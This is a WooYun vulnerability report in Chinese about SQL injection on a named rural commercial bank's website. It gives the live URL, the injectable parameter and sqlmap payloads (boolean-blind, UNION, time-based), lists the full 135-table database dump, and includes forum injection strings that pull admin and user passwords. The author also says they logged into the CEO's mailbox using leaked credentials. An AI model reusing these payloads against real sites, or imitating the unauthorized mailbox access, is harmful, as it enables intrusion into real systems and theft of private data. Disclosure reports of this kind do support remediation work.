当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076237

漏洞标题:某市农村商业银行存在SQL注射并导致信息泄露

相关厂商:cncert国家互联网应急中心

漏洞作者: 袋鼠妈妈

提交时间:2014-09-16 15:54

修复时间:2014-10-31 15:56

公开时间:2014-10-31 15:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-16: 细节已通知厂商并且等待厂商处理中
2014-09-21: 厂商已经确认,细节仅向厂商公开
2014-10-01: 细节向核心白帽子及相关领域专家公开
2014-10-11: 细节向普通白帽子公开
2014-10-21: 细节向实习白帽子公开
2014-10-31: 细节向公众公开

简要描述:

某市农村商业银行存在SQL注射并导致敏感信息泄露

详细说明:

河南济源农村商业银行
地址:http://www.jynsh.com/
(1)sql注射

http://www.jynsh.com/show.php?id=22495&cid=238


参数:ID

qq1.gif

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=22495 AND 3998=3998&cid=238
    Type: UNION query
    Title: MySQL UNION query (NULL) - 23 columns
    Payload: id=-4441 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a7976763a,0x4d4964514f6842494a70,0x3a6f6b743a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&cid=238
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=22495 AND SLEEP(5)&cid=238
---
web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL >= 5.0.0
Database: jynshcom
[135 tables]
+---------------------------+
| adl_content               |
| adl_modu_auth             |
| article                   |
| articleclass              |
| auth_role                 |
| chatmessage               |
| chatsession               |
| chatuserlist              |
| counter                   |
| counter_authitem          |
| counter_browsecap         |
| counter_ipaddr            |
| customer                  |
| dayduty                   |
| doc_qs                    |
| dutygroup                 |
| dv_active                 |
| dv_activeuser             |
| dv_admin                  |
| dv_argue                  |
| dv_argue_topic            |
| dv_banklog                |
| dv_bankstatus             |
| dv_bbs1                   |
| dv_bbs_ft                 |
| dv_bbslink                |
| dv_bbsnews                |
| dv_besttopic              |
| dv_board                  |
| dv_boardpermission        |
| dv_bookmark               |
| dv_chanorders             |
| dv_friend                 |
| dv_fsettings              |
| dv_gather_info            |
| dv_gather_url             |
| dv_group_bbs1             |
| dv_group_board            |
| dv_group_name             |
| dv_group_topic            |
| dv_group_user             |
| dv_groupname              |
| dv_help                   |
| dv_honor_list             |
| dv_honor_user             |
| dv_log                    |
| dv_message                |
| dv_moneylog               |
| dv_note_info              |
| dv_online                 |
| dv_plus                   |
| dv_plus_tools_buss        |
| dv_plus_tools_info        |
| dv_plus_tools_magicface   |
| dv_querycache             |
| dv_savvy_integral         |
| dv_savvy_topic            |
| dv_savvy_wealth           |
| dv_setup                  |
| dv_smallpaper             |
| dv_space_apply_today_star |
| dv_space_keyword          |
| dv_space_post             |
| dv_space_skins            |
| dv_space_syscat           |
| dv_space_system           |
| dv_space_topic            |
| dv_space_upfile           |
| dv_space_user             |
| dv_space_usercat          |
| dv_space_usersave         |
| dv_styles                 |
| dv_sysfiles               |
| dv_sysupgrade             |
| dv_tablelist              |
| dv_topic                  |
| dv_topic_ft               |
| dv_upfile                 |
| dv_user                   |
| dv_useraccess             |
| dv_usergroups             |
| dv_vote                   |
| dv_voteuser               |
| email                     |
| file                      |
| flink_main                |
| ipjilu                    |
| ipname                    |
| mailinfo                  |
| menu                      |
| menu_deleted              |
| menu_role                 |
| message                   |
| modu                      |
| news_manage_modu_attach   |
| news_manage_modu_auth     |
| news_manage_modu_class    |
| news_manage_modu_content  |
| online_vod_modu_attach    |
| online_vod_modu_auth      |
| online_vod_modu_class     |
| online_vod_modu_content   |
| pop_modu_auth             |
| pos_apply                 |
| pos_handle                |
| pos_img                   |
| public_information        |
| roles                     |
| skin                      |
| soft                      |
| softtype                  |
| tmp                       |
| tmp1                      |
| tsjy_sl                   |
| tsjy_xx                   |
| user_dep                  |
| user_modu_auth            |
| users                     |
| users_deleted             |
| users_roles               |
| users_type                |
| vote_answer               |
| vote_modu_auth            |
| vote_question             |
| xedk_exp_date             |
| xedk_jtcy                 |
| xedk_sl                   |
| xedk_sq                   |
| xedk_user                 |
| xedk_xx                   |
| xedk_zh                   |
| xxgk                      |
| youqinglj                 |
| zhaopin_date              |
| zhaopinxx                 |
+---------------------------+

<未进后台,比较奇葩获取到用户密码却登录不了有IP限制么?>
(2)不成功的论坛注射:

Copyright © 2000 – 2008 Dvbbs.PHP Powered By Dvbbs Version 2.0++ RC1

网上搜索了下存在sql注射.但是无法射出后台用户密码(事后在数据库表中dv_admin内容也是空的,为撒?)
(a)注射后台用户boardrule.php?groupboardid=1/**/union/**/select/**/concat(username,password)/**/from%20dv_admin%20where%20%20id%20=%201/**/
(b)注射前台用户boardrule.php?groupboardid=1/**/union/**/select/**/concat(username,userpassword)/**/from%20dv_user%20where%20%20userid%20=%201/**/

qq2.gif


(3)在数据库中MailInfo表泄漏了内部邮箱账户:

qq4.gif

qq3.gif

根据其提示的两个邮箱,测试登录(该处仅测试登录,作为一个小白,未查看内容!),作为CEO邮箱,内容算不上绝密机密,也比较敏感吧

qq5.gif

qq6.gif

qq7.gif


漏洞证明:

如上

修复方案:

版权声明:转载请注明来源 袋鼠妈妈@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-09-21 10:03

厂商回复:

最新状态:

暂无